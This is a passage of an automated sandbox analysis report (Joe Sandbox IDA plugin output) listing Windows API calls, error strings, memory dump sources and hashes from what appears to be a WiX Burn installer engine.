                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00904A6E
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00905466,?,?,?,?,?,?,?,?,?,?,?), ref: 00904A77
                                                                                                                                                                    Strings
                                                                                                                                                                    • comres.dll, xrefs: 009049DD
                                                                                                                                                                    • Failed to connect to unelevated process., xrefs: 00904916
                                                                                                                                                                    • Failed to allocate thread local storage for logging., xrefs: 0090495F
                                                                                                                                                                    • Failed to set elevated pipe into thread local storage for logging., xrefs: 009049A8
                                                                                                                                                                    • Failed to create the message window., xrefs: 009049CC
                                                                                                                                                                    • engine.cpp, xrefs: 00904955, 0090499E
                                                                                                                                                                    • Failed to pump messages from parent process., xrefs: 00904A42
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                                                                                                                    • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00913BA2
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00913BAC
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00913C15
                                                                                                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00913C1C
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 00913CA6
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get length of temp folder., xrefs: 00913C06
                                                                                                                                                                    • %u\, xrefs: 00913C36
                                                                                                                                                                    • Failed to get length of session id string., xrefs: 00913C71
                                                                                                                                                                    • Failed to copy temp folder., xrefs: 00913CCF
                                                                                                                                                                    • crypt32.dll, xrefs: 00913B61
                                                                                                                                                                    • Failed to get temp folder., xrefs: 00913BDA
                                                                                                                                                                    • logging.cpp, xrefs: 00913BD0
                                                                                                                                                                    • Failed to format session id as a string., xrefs: 00913C4A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                                                                                                                                    • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00907FC2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 009081EA
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get version., xrefs: 0090819B
                                                                                                                                                                    • Failed to write variable value as number., xrefs: 00908194
                                                                                                                                                                    • Failed to get string., xrefs: 009081B5
                                                                                                                                                                    • Failed to write included flag., xrefs: 009081D8
                                                                                                                                                                    • feclient.dll, xrefs: 0090809D, 009080F3, 00908134
                                                                                                                                                                    • Failed to get numeric., xrefs: 009081BC
                                                                                                                                                                    • Failed to write variable count., xrefs: 00907FDD
                                                                                                                                                                    • Failed to write variable value as string., xrefs: 009081AE
                                                                                                                                                                    • Unsupported variable type., xrefs: 009081A7
                                                                                                                                                                    • Failed to write variable name., xrefs: 009081D1
                                                                                                                                                                    • Failed to write literal flag., xrefs: 009081C3
                                                                                                                                                                    • Failed to write variable value type., xrefs: 009081CA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0091A843,00000000,00000000,00000000,?,00000000), ref: 009197CD
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009197DD
                                                                                                                                                                      • Part of subcall function 00944102: Sleep.KERNEL32(?,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00904DBC), ref: 00944119
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009198E9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to verify payload hash: %ls, xrefs: 00919875
                                                                                                                                                                    • Failed to move %ls to %ls, xrefs: 009198C1
                                                                                                                                                                    • Copying, xrefs: 00919888, 00919893
                                                                                                                                                                    • %ls payload from working path '%ls' to path '%ls', xrefs: 00919894
                                                                                                                                                                    • cache.cpp, xrefs: 00919801
                                                                                                                                                                    • Failed to verify payload signature: %ls, xrefs: 00919838
                                                                                                                                                                    • Moving, xrefs: 0091987F
                                                                                                                                                                    • Failed to open payload in working path: %ls, xrefs: 0091980C
                                                                                                                                                                    • Failed to copy %ls to %ls, xrefs: 009198D7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                                    • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 009065FC
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00906628
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906636
                                                                                                                                                                    • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0090666E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906678
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009066BB
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009066C5
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get 64-bit system folder., xrefs: 00906664
                                                                                                                                                                    • Failed to get 32-bit system folder., xrefs: 009066A6
                                                                                                                                                                    • variable.cpp, xrefs: 0090665A, 0090669C
                                                                                                                                                                    • Failed to set system folder variant value., xrefs: 00906724
                                                                                                                                                                    • Failed to backslash terminate system folder., xrefs: 00906708
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                                                                                                                                    • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00913AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00913FB5,feclient.dll,?,00000000,?,?,?,00904B12), ref: 00913B42
                                                                                                                                                                    • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?,?,0094B488,?,00000001,00000000,00000000), ref: 0091404C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseSleep
                                                                                                                                                                    • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000001,?,00000000,00905445,00000006,?,009082B9,?,?,?,00000000,00000000,00000001), ref: 00906DC8
                                                                                                                                                                      • Part of subcall function 009056A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00906595,00906595,?,0090563D,?,?,00000000), ref: 009056E5
                                                                                                                                                                      • Part of subcall function 009056A9: GetLastError.KERNEL32(?,0090563D,?,?,00000000,?,?,00906595,?,00907F02,?,?,?,?,?), ref: 00905714
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,009082B9), ref: 00906F59
                                                                                                                                                                    Strings
                                                                                                                                                                    • Attempt to set built-in variable value: %ls, xrefs: 00906E56
                                                                                                                                                                    • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00906F6B
                                                                                                                                                                    • variable.cpp, xrefs: 00906E4B
                                                                                                                                                                    • Failed to set value of variable: %ls, xrefs: 00906F41
                                                                                                                                                                    • Setting string variable '%ls' to value '%ls', xrefs: 00906EED
                                                                                                                                                                    • Failed to find variable value '%ls'., xrefs: 00906DE3
                                                                                                                                                                    • Setting hidden variable '%ls', xrefs: 00906E86
                                                                                                                                                                    • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00906ED0
                                                                                                                                                                    • Failed to insert variable '%ls'., xrefs: 00906E0D
                                                                                                                                                                    • Unsetting variable '%ls', xrefs: 00906F15
                                                                                                                                                                    • Setting numeric variable '%ls' to value %lld, xrefs: 00906EFA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                    • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                    • API String ID: 2716280545-445000439
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00912C8A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to add registration action for dependent related bundle., xrefs: 00912F8E
                                                                                                                                                                    • Failed to check for remaining dependents during planning., xrefs: 00912E30
                                                                                                                                                                    • crypt32.dll, xrefs: 00912CD5, 00912DCF, 00912EC4, 00912F39
                                                                                                                                                                    • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00912DF4
                                                                                                                                                                    • wininet.dll, xrefs: 00912ED7
                                                                                                                                                                    • Failed to add registration action for self dependent., xrefs: 00912F57
                                                                                                                                                                    • Failed to add dependents ignored from command-line., xrefs: 00912D3F
                                                                                                                                                                    • Failed to create the string dictionary., xrefs: 00912CC3
                                                                                                                                                                    • Failed to add self-dependent to ignore dependents., xrefs: 00912D0E
                                                                                                                                                                    • Failed to allocate registration action., xrefs: 00912CF3
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                                                                                                                    • API String ID: 1825529933-1705955799
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0091F947
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 0091FA2A
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 0091FA4B
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 0091FAF4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to convert bundle update guid into string., xrefs: 0091FA6A
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091FA60
                                                                                                                                                                    • Failed to set update bundle., xrefs: 0091FACE
                                                                                                                                                                    • Failed to default local update source, xrefs: 0091F9B7
                                                                                                                                                                    • Failed to create bundle update guid., xrefs: 0091FA37
                                                                                                                                                                    • update\%ls, xrefs: 0091F9A3
                                                                                                                                                                    • Failed to recreate command-line for update bundle., xrefs: 0091FA12
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                                                                    • API String ID: 171215650-2594647487
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsWindow.USER32(?), ref: 00904C64
                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00904C75
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to check global conditions, xrefs: 00904B49
                                                                                                                                                                    • WixBundleLayoutDirectory, xrefs: 00904BF5
                                                                                                                                                                    • Failed to set layout directory variable to value provided from command-line., xrefs: 00904C06
                                                                                                                                                                    • Failed to create the message window., xrefs: 00904B98
                                                                                                                                                                    • Failed while running , xrefs: 00904C2A
                                                                                                                                                                    • Failed to set registration variables., xrefs: 00904BDE
                                                                                                                                                                    • Failed to query registration., xrefs: 00904BAE
                                                                                                                                                                    • Failed to set action variables., xrefs: 00904BC4
                                                                                                                                                                    • Failed to open log., xrefs: 00904B18
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessagePostWindow
                                                                                                                                                                    • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                    • API String ID: 3618638489-3051724725
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0091F06E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0091F19B
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091F17C
                                                                                                                                                                    • Failed to post launch approved exe message., xrefs: 0091F186
                                                                                                                                                                    • Failed to copy the id., xrefs: 0091F100
                                                                                                                                                                    • UX requested unknown approved exe with id: %ls, xrefs: 0091F0CE
                                                                                                                                                                    • Failed to copy the arguments., xrefs: 0091F12D
                                                                                                                                                                    • Engine is active, cannot change engine state., xrefs: 0091F089
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                                                                    • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                                                                    • API String ID: 1367039788-528931743
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0091A7D4,00000000,00000000,00000000,?,00000000), ref: 009196B8
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009196C6
                                                                                                                                                                      • Part of subcall function 00944102: Sleep.KERNEL32(?,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00904DBC), ref: 00944119
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009197A4
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                                    • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                                                                    • API String ID: 1275171361-1187406825
                                                                                                                                                                    • Opcode ID: 25f855ccffc36dd770d5322654066f8b4f309c2ca798d32c90f3a7ba5b4e14b1
                                                                                                                                                                    • Instruction ID: a4d28a6a9791649089a030b3641af4c817b18ff654272551844d64a3ec5d589a
                                                                                                                                                                    • Opcode Fuzzy Hash: 25f855ccffc36dd770d5322654066f8b4f309c2ca798d32c90f3a7ba5b4e14b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 68213532B802287BD7325A699C5AFEB665CDFC1B65F100114FE14BB2C0D2A1AE40D6E2
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00906FB2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 009071BE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to read variable value type., xrefs: 009071A0
                                                                                                                                                                    • Failed to read variable included flag., xrefs: 009071AE
                                                                                                                                                                    • Failed to read variable literal flag., xrefs: 00907199
                                                                                                                                                                    • Failed to read variable value as number., xrefs: 00907178
                                                                                                                                                                    • Unsupported variable type., xrefs: 00907184
                                                                                                                                                                    • Failed to set variable., xrefs: 00907192
                                                                                                                                                                    • Failed to read variable count., xrefs: 00906FD2
                                                                                                                                                                    • Failed to set variable value., xrefs: 00907171
                                                                                                                                                                    • Failed to read variable value as string., xrefs: 0090718B
                                                                                                                                                                    • Failed to read variable name., xrefs: 009071A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                                    • API String ID: 3168844106-528957463
                                                                                                                                                                    • Opcode ID: 84a36bd1ba5b53546b6878075f70899cd201ece2c1c0d5a84625ff2c54b3caff
                                                                                                                                                                    • Instruction ID: 424f9343af22390ab381ab847236d4a3a3c221c603fb86320fb79dfdc100ebd0
                                                                                                                                                                    • Opcode Fuzzy Hash: 84a36bd1ba5b53546b6878075f70899cd201ece2c1c0d5a84625ff2c54b3caff
                                                                                                                                                                    • Instruction Fuzzy Hash: 34718D72C0921EBFDF11DAE4DC46EAEBBB9EB84724F104521F910A61D0D734AE109BA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00944550
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00944566
                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 009445BF
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009445C9
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 0094461D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00944628
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 00944717
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0094478A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 3286166115-2967768451
                                                                                                                                                                    • Opcode ID: a11a78a85e89c3c90fa9276b655a62f4d5e374bb405186d1d3eb2d0779a82684
                                                                                                                                                                    • Instruction ID: 00669c00b84213146b78b0bace4eb01a1be348a244758946227840ef5a9bf127
                                                                                                                                                                    • Opcode Fuzzy Hash: a11a78a85e89c3c90fa9276b655a62f4d5e374bb405186d1d3eb2d0779a82684
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B812336A40226EBEF218E698C45F7F76ACAF41760F224129FD15EB280E774DD009BD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 009030C1
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009030C7
                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00903121
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00903127
                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009031DB
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009031E5
                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0090323B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00903245
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
